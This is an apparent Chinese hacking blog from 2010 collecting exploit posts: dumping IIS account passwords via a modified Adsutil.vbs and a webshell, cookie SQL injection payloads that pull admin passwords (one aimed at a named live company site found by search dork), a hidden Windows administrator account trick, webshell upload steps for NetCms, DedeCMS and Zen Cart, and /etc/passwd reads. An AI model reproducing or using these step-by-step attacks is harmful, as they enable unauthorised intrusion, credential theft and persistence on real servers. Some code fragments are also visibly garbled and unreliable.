影子鹰安全网络-主站技术BLOG

使用Adsutil.vbs脚本获取IIS配置信息及账号密码

kawen — 2010-9-3 8:47:11

今晚在搞个黑客站的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。

       无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit

       将以上代码保存为1.vbs，执行”cscript C:\recycler\1.vbs“ 命令，cscript C:\recycler\1.vbs是我传到服务器上的路径，执行成功后就会列出IIS的基本信息了。

如上图所示，列出来的信息中包含了网站id 显示名称以及路径三个信息，这里我们要记下目标站的id为：360363061，路径为：D:\wwwroot\fucksbhack8\wwwroot。

       现在就得到了目标网站的基本信息了，但是这对我们拿下最终目标站的权限有啥用呢？呵呵！不急，我们接下来就要想办法得到这个网站的iis用户名和密码，然后使用bs大牛写的webshell来夸目录。

       当时和龙儿心搞定了目标站路径信息后为得到目标站的IIS账号密码还真费了不少功夫，后来还是多亏了龙儿心给我看的一篇文章，仔细看了过后才明白了怎么使用Adsutil.vbs来获取IIS账号密码。首先搞个Adsutil.vbs文件来，文件内容太多，我就不贴出来了，本文中所用到的工具最后我会全部打包。

       搞到Adsutil.vbs文件后我们需要改动下内容，我首先搜索”If (Attribute = True) Then“，然后再下面几行中会看到如下内容：

     If (Attribute = True) Then
        IsSecureProperty = False
     Else
        IsSecureProperty = True
     End If

       首先我们要获取目标站点IIS的账号，我们将第一个IsSecureProperty 的值修改成IsSecureProperty = False，然后保存，上传到服务器上。

       在执行的时候我们需要用到之前使用的vbs脚本获取到目标网站的id值，这里是360363061，然后我们使用”cscript C:\recycler\k.vbs enum w3svc/360363061/root“命令来获取目标站的IIS账号信息。如上图所示，成功的获取到目标站IIS账号为sbhack8_web，接下来我们就是获取密码了，同样的方法还需要将Adsutil.vbs文件中刚才修改的地方，将第二个IsSecureProperty 修改成IsSecureProperty = False，然后再把第一个IsSecureProperty 修改成IsSecureProperty = True，既两个的值互相调换一下，然后再执行同样的命令”cscript C:\recycler\k.vbs enum w3svc/360363061/root“来获取密码信息。
这样就搞到了目标站IIS用户的账号和密码了，先就要排bs大牛的shell上场了，在要使用BS大牛的shell之前我们还需要改动喜爱BS大牛的shell内容。

       搜索bs大牛shell中内容”Const bOtherUser=False“，然后修改成”Const bOtherUser=True“，保存，上传到服务器任意网站目录下，当然还是要支持asp的了，然后访问，然后出现下图所示内容。这里直接点击OK，然后稍等下一下就会弹出登陆框了，如下图所示：然后我们在这里输入刚才得到的目标站的IIS账号和密码，然后登陆，成功了的话就会进入shell的登录框了。这里如数webshell的密码进入后直接拿目标站的路径跳转，然后就会发现目标站的目录和文件全部列出来了！不BT的话是有写入权限的！！方便大家我把文章中提及的工具全部打包了！！

      *最后补充下，我下来本地测试了下Adsutil.vbs的修改地方，我们直接将If (Attribute = True) Then下面的两个IsSecureProperty值都修改为True的时候就会同时列出账号和密码了，没必要获取了账号，然后再修改下去获取密码。
http://www.51chi.net/sysexp/iisvbs.rar

iwebshop0.7.7 0day

kawen — 2010-9-3 8:43:14

漏洞出在根目录的auction_list.php,第77行-86行:

/* 浏览记录 */
$getcookie = get_hisgoods_cookie();
$goodshistory = array();
if($getcookie) {
arsort($getcookie);
$getcookie = array_keys($getcookie);
$gethisgoodsid = implode(",",array_slice($getcookie, 0, 4));
$sql = "select is_set_image,goods_id,goods_name,goods_thumb,goods_price from $t_goods where goods_id in ($gethisgoodsid)";
$goodshistory = $dbo->getRs($sql);
}

$gethisgoodsid这个参数未经过滤就带入查询.它是由$getcookie得来的.跟一下$getcookie这个变量.即get_hisgoods_cookie()函数.

foundation/fcookie.php中:

function get_hisgoods_cookie() {
return get_cookie("hisgoods");
}

同样是foundation/fcookie.php:

function get_cookie($k) {
lobal $session_prefix;
if(isset($_COOKIE[$session_prefix.$k])) return $_COOKIE[$session_prefix.$k];
return null;
}

原来是在COOKIE里取得变量的,至此漏洞产生.

利用方法:先随便看一个商品,然后访问http://localhost/auction_list.php.使用cookies浏览器的话,你会发现里面会多了个类似"iweb_hisgoods[22(这个数字是你访问过的商品的id)]=1282282762"的项目.首先在"22"后面加个单引号,使其暴错,得出数据表的前缀.然后将"22"改为"22) and 1%3D2 union select 1,admin_password,admin_name,4,5 from ishop_admin_user-- "(ishop_是你刚才得出的前缀,"--"即注释符后一定要加个空格).再访问http://localhost/auction_list.php,查看右下角最新浏览就会得出管理员的帐号和密码.

cookie注射批量拿企业站

kawen — 2010-9-3 8:42:30

直接百度或者google一下

关键字：inurl:CompHonorBig.asp?id 出现了很多站点..百度一下，找到相关网页约35,700篇，用时0.231秒

我们到后面几页随便打开一个 http://www.xzruizhe.com/

打开教学教研这个栏目随便找到一篇文件..地址为;http://www.xzruizhe.com/shownews.asp?id=225&BigClass=产品展示

现在我们可以开始输入注射语句了：

javascript:alert(document.cookie="id="+escape("86 union select 1,password,username,password,5,6,7,8,9,10,11 from admin"));

输入到IE中,然后会有一个提示

然后我们点确定,然后再进入http://www.xzruizhe.com/shownews.asp

我们可以看到现在的账号和密码已经被爆出来了.

接下来我们开始破解密码了..大家可以去www.cmd5.com破解就可以了.

之后开始登陆后台咯

http://www.你入侵的地址.com/admin

成功登陆了...

微软全系统建立隐藏账户漏洞

kawen — 2010-9-3 8:41:51

可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..

可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:
net user 123 /add
net localgroup administrators /add
注意其中的空白字符.非空格.
建立后命令行下用net user命令查看账户显示为空白,在用户界面中同样显示空白.
建立此帐号后无法在mstsc中直接输入登陆,需要在远程桌面的选项面板的常规选项卡中的用户名一栏里用智能ABC的V9输入特殊字符后再次连接.

新建一个批处理,内容如下.
net user 123 /add
net localgroup administrators /add
执行后查看用户管理界面,看看是否有个空白帐号.

修复方案：过滤这些特殊字符吧.

ecshop广告调用页消息头写入暴路

kawen — 2010-9-1 8:25:11

/affiche.php,php5环境提示错误暴露程序路径，php4环境显示写入的信息
charset参数未做严谨过滤导致http消息头截断写入
http://localhost/test/ecshop/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A

动网PHP论坛preview.php代码执行漏洞

kawen — 2010-9-1 8:24:49

动网（DVBBS）PHP论坛preview.php代码执行漏洞

动网（DVBBS）论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。

在文件preview.php中：
require printout('preview'); //第9行
……
函数printout在文件inc/ dv_clsmain.php中：
function printout($template,$ext="tpl.php"){ //第464行
文件最后包含了templates\default\ preview.tpl.php文件
……
在文件templates\default\ preview.tpl.php中：
$theBody =& Dv_CodeProcess($theBody, $tmpuserinfo, Ubblist($theBody).'39,', 1, 0); //第31行
& Dv_CodeProcess函数在文件inc/dv_code.php文件中：
function &Dv_CodeProcess(&$code,&$currUserInfo,$ubblists,$PostType=1,$sType=1) //第332行
……
$arrPattern[] = '#\[url\s*=\s*([^\]]+)](.*?)\[img](.+?)\[\/img](.*?)\[/url]#iesm'; //第415行
$arrRepl[] = '\'$2$4\'';
……
$returnval = preg_replace( $arrPattern ,$arrRepl ,$code ); //第861行
函数preg_replace当第一个参数的正则表达式有e符号的时候，第二个参数的字符串当做PHP代码执行。

zen cart 1.38a 多处漏洞0day

kawen — 2010-8-31 8:24:50

" target="_blank">http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:

大家试下威力。直接上传PHP WEBSHELL 到IMAGES

漏洞测试2：Zen Cart 本地文件泄露

得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd

DedeCmsV5.6 本地包含里的上传漏洞利用

kawen — 2010-8-28 14:27:36

本地包含的利用方法。

http://www.ra1nker/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”>

上传一个图片木马（只改后辍名为图片类型就行），即可在网站根目录生成 1.asa 文件
简单分析：
文件：select_soft_post.php

01.if(!isset($cfg_basedir)) 02.{ 03.include_once(dirname(__FILE__).’/config.php’); 04.} 05.//config.php 是用于验证是否管理员。由于本地包含， $cfg_basedir 已经设置了值，应该跳过了验证。 06.//文件名（前为手工指定，后者自动处理） 07.if(!empty($newname)) 08.{ 09.$filename = $newname; 10.if(!ereg(“\.”, $filename)) $fs = explode(‘.’, $uploadfile_name); 11.else $fs = explode(‘.’, $filename); 12.if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 13.{ 14.ShowMsg(“你指定的文件名被系统禁止！”,’javascript:;’); 15.exit(); 16.} 17.if(!ereg(“\.”, $filename)) $filename = $filename.’.’.$fs[count($fs)-1]; 18.}else{ 19.$filename = $cuserLogin->getUserID().’-’.dd2char(MyDate(‘ymdHis’,$nowtme)); 20.$fs = explode(‘.’, $uploadfile_name); 21.if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 22.{ 23.ShowMsg(“你上传了某些可能存在不安全因素的文件，系统拒绝操作！”,’javascript:;’); 24.exit(); 25.} 26.$filename = $filename.’.’.$fs[count($fs)-1]; 27.}
问题就出在 $newname 那里，没验证上传类型，但验证了非可上传类型

01.//这里强制限定的某些文件类型禁止上传 02.$cfg_not_allowall = “php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml”;
即可以上传非上面类型的文件，有时也并不鸡肋。。

NetCms 注册上传漏洞 Oday

kawen — 2010-8-26 11:30:51

NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源 ,由于发表消息附件未

进行严格过滤，导致可上传任意文件漏洞。

测试利用： 1、进去， /user/login.aspx ，点注册。

2、在发表文章页面，点击“选择图片”，我们在这里，记下这个目录名， Userfiles/049357214223 ，这是你的附件保存的目录名。

3、然后在站内信息那块，给自己发送个站内信，附件里直接传马。

4、然后，在收件箱找到这个站内信，打开，下载附件，在这里记录下我们的马儿上传上去后的名字就好了。

得到马儿的新名字： c58f7a4d96073cafc.asp

5、然后，我们的马儿完整的路径就是 Userfiles/049357214223/c58f7a4d96073cafc.asp，敲进地址栏，回车

二

继NetCms 注册上传漏洞 Oday后，又有人发现另一种上传漏洞。本文只作描述利用方法，仅供学习交流！

NetCms 注册上传漏洞 Oday

1.注册帐号

2.点击修改基本信息，然后点击自定义头像

3.点击上传文件

4.上传图片文件,（1.jpg这种格式也可以,后面有利用方法）

5.上传成功

6.访问http://www.ooxx.com/Userfiles/614846612009/123.asp;x.jpg

7.点击修改,修改成123.asp

8.访问http://www.ooxx.com/Userfiles/614846612009/123.asp

Discuz!漫游插件API本地包含漏洞

kawen — 2010-8-26 11:30:04

Discuz!漫游插件API本地包含漏洞,该插件默认不安装,并且服务默认不开启.

manyou/api/class/MyBase.php

128: function parseRequest() {
131: $request = $_POST;
132: $module = $request['module'];
133: $method = $request['method'];
...
174: return $this->callback($module, $method, $params);
175: }

177: function callback($module, $method, $params) {
...
191: @include_once DISCUZ_ROOT.'./manyou/api/class/'.$module.'.php';

首发路人甲，由情整理编辑